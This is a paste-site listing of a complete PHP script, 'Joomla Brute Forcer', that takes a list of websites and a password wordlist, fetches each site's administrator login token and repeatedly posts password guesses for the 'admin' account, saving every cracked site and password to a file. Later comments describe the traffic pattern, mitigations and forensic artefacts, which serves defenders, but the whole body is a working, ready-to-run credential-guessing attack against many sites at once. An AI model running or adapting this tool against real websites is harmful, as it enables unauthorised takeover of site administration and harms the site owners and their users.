YeiZeta

Panel Brute Force Joomla

Oct 2nd, 2012
  1. <?php
  // Lifts PHP's execution time limit (0 = no limit), so the run is not cut off
  // by max_execution_time while it works through the site and password lists.
  2. set_time_limit(0);
  3. /*
  4. * Joomla Brute Forcer
  5. * Coded by miyachung
  6. * miyachung@hotmail.com
  7. * Janissaries.Org
  8. * Special Thanks burtay
  9. * Usage-> php Bruter.php SITELIST PASSWORDS
  10. * Example-> php Bruter.php SITES.txt PASSWORDS.txt
  11. */
  12.  
  13.  
  /*
   * jom: password-guessing client for the Joomla administrator login form.
   *
   * For each site in a list it requests /administrator/index.php, takes a
   * 32-hex-character value from the returned page, and then sends one login
   * POST per wordlist entry for the fixed account name "admin".
   *
   * What this looks like on the receiving server (derived from the requests
   * built in get_Hash() and tryPassword() below):
   *   - one GET of /administrator/index.php, then a sequential run of POSTs to
   *     the same URL carrying username=admin, option=com_login, task=login and
   *     an identical <32-hex>=1 field on every attempt;
   *   - every POST replays the cookies saved by that first GET;
   *   - CURLOPT_USERAGENT is never set in this class, so the requests probably
   *     arrive without a User-Agent header -- confirm against your own logs.
   *
   * Controls that blunt this pattern: throttling or lockout on failed back-end
   * logins, an administrator account not named "admin", a second factor on
   * the back end, and limiting /administrator to known networks or placing it
   * behind an extra HTTP authentication layer.
   *
   * Host artefacts for incident response: the relative paths cookie.jani and
   * cracks.txt are created in the working directory of the process.
   */
  14. class jom
  15. {
  16.  
  // Path of the site-list file; assigned by the caller from the first CLI argument.
  17. public $sites;
  // Path of the password-list file; assigned by the caller from the second CLI argument.
  18. public $wordlist;
  // Only this one account name is ever submitted.
  19. private $user = "admin";
  // Matches the first run of 32 hexadecimal characters in the login page.
  20. private $regex = "/([0-9a-f]{32})/si";
  // Per-request cURL timeout, in seconds.
  21. private $timeout = 7;
  // Cookie store written by get_Hash() and read back by tryPassword().
  22. private $cookie_file = "cookie.jani";
  // Append-only result file; one "site|password" line per successful login.
  23. private $log_file = "cracks.txt";
  24.  
  /*
   * Appends $content to the log file.
   * Returns true when fopen() yielded a handle, false otherwise.
   * NOTE(review): the handle is tested only after fwrite()/fclose() have
   * already been called on it.
   */
  25. private function save_File($content)
  26. {
  27. $fp = fopen($this->log_file,'ab');
  28. fwrite($fp,$content);
  29. fclose($fp);
  30. if($fp)
  31. {
  32. return true;
  33. }
  34. else
  35. {
  36. return false;
  37. }
  38. }
  /*
   * Fetches $site/administrator/index.php and returns the first 32-hex string
   * found in the page, or false when the page lacks the value="com_login" marker.
   * The value is later posted as a form field name with the value 1; presumably
   * it is the per-session form token of the login form -- verify against the
   * Joomla version in question. Any client that loads the form receives it, so
   * it does not limit repeated guessing by itself.
   */
  39. private function get_Hash($site)
  40. {
  41. $curl = curl_init();
  42. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  43. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  // Cookies from this response are written to the cookie file when the handle closes.
  44. curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
  45. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  46. $play = curl_exec($curl);
  47. curl_close($curl);
  // The marker decides whether the response is treated as a Joomla login page.
  48. if(preg_match('#value="com_login"#si',$play))
  49. {
  50. preg_match($this->regex,$play,$hash);
  51. return $hash[1];
  52. }
  53. else
  54. {
  55. echo "[-]Hash not found,passing site\n";
  56. return false;
  57. }
  58. }
  /*
   * Sends one login POST for $this->user with $password and the token field
   * $hash, following redirects, and returns the final response body.
   * The fixed field set (username, passwd, lang, option=com_login, task=login,
   * <token>=1) is what a log or WAF rule can key on.
   */
  59. private function tryPassword($site,$password,$hash)
  60. {
  61. $curl = curl_init();
  62. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  63. curl_setopt($curl,CURLOPT_POST,TRUE);
  64. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
  65. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  // Reads the cookies stored by get_Hash(); no cookie jar is set here, so
  // cookies issued during the login attempt are not saved.
  66. curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
  67. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  68. curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."&lang=&option=com_login&task=login&".$hash."=1");
  69. $play = curl_exec($curl);
  70. curl_close($curl);
  71. return $play;
  72. }
  /*
   * Main loop: for every line of the site list, obtain the token and submit
   * each wordlist entry in order until a response contains "com_config".
   * Attempts are strictly sequential with no delay between them, so a
   * per-account or per-source failure counter sees the whole run.
   */
  73. public function bruter()
  74. {
  75. $sites = explode("\n",file_get_contents($this->sites));
  76.  
  77. foreach($sites as $site)
  78. {
  // Entries without "http" anywhere in them get an http:// prefix.
  79. if(!preg_match('#http#si',$site)) $site = "http://".$site;
  80. $site = trim($site);
  81. echo "\n[+]$site\n";
  82. $hash = $this->get_Hash($site);
  // No token means the site is skipped without any login attempt.
  83. if(!$hash){continue;}
  84. echo "[+]$hash\n";
  85.  
  // The password list is read from disk again for every site.
  86. $wordlist = explode("\n",file_get_contents($this->wordlist));
  87. foreach($wordlist as $password)
  88. {
  89. $try = $this->tryPassword($site,trim($password),$hash);
  // Success test: "com_config" appears in the response, presumably a string
  // rendered only in the authenticated back end -- confirm.
  90. if(preg_match("/com_config/si",$try))
  91. {
  92. echo "\n\t[*]Password cracked-> ".$password."\n";
  93. echo "\t[*]Saved to the log file\n";
  // Result record format: "<site>|<password>" terminated by CRLF.
  94. $this->save_File("$site|$password\r\n");
  95. break;
  96. }
  97.  
  98. }
  99. }
  100. }
  101. }
  102.  
  /*
   * Command-line entry point. Prints the banner in every branch, then:
   *   - exits with "Missing arguments" when either CLI argument is empty or unset;
   *   - exits with "File not found" when either path does not exist;
   *   - otherwise creates a jom instance, assigns the two paths and starts bruter().
   * The paths are used as given; nothing here validates the contents of either file.
   */
  103. if(!$argv[1] || !$argv[2])
  104. {
  105. echo "################################################\n";
  106. echo "\t\tJoomla Brute Forcer\n";
  107. echo "\t\tCoded By miyachung\n";
  108. echo "\t\tJanissaries.Org\n";
  109. echo "################################################\n";
  110. echo "\n[-]Missing arguments\n";
  111. exit;
  112. }
  113. elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
  114. {
  115. echo "################################################\n";
  116. echo "\t\tJoomla Brute Forcer\n";
  117. echo "\t\tCoded By miyachung\n";
  118. echo "\t\tJanissaries.Org\n";
  119. echo "################################################\n";
  120. echo "\n[-]File not found\n";
  121. exit;
  122. }
  123. else
  124. {
  125. echo "################################################\n";
  126. echo "\t\tJoomla Brute Forcer\n";
  127. echo "\t\tCoded By miyachung\n";
  128. echo "\t\tJanissaries.Org\n";
  129. echo "################################################\n";
  130.  
  // First argument: site-list path; second argument: password-list path.
  131. $jom = new jom;
  132. $jom->sites = $argv[1];
  133. $jom->wordlist = $argv[2];
  134. $jom->bruter();
  135. }
  136.  
  137. ?>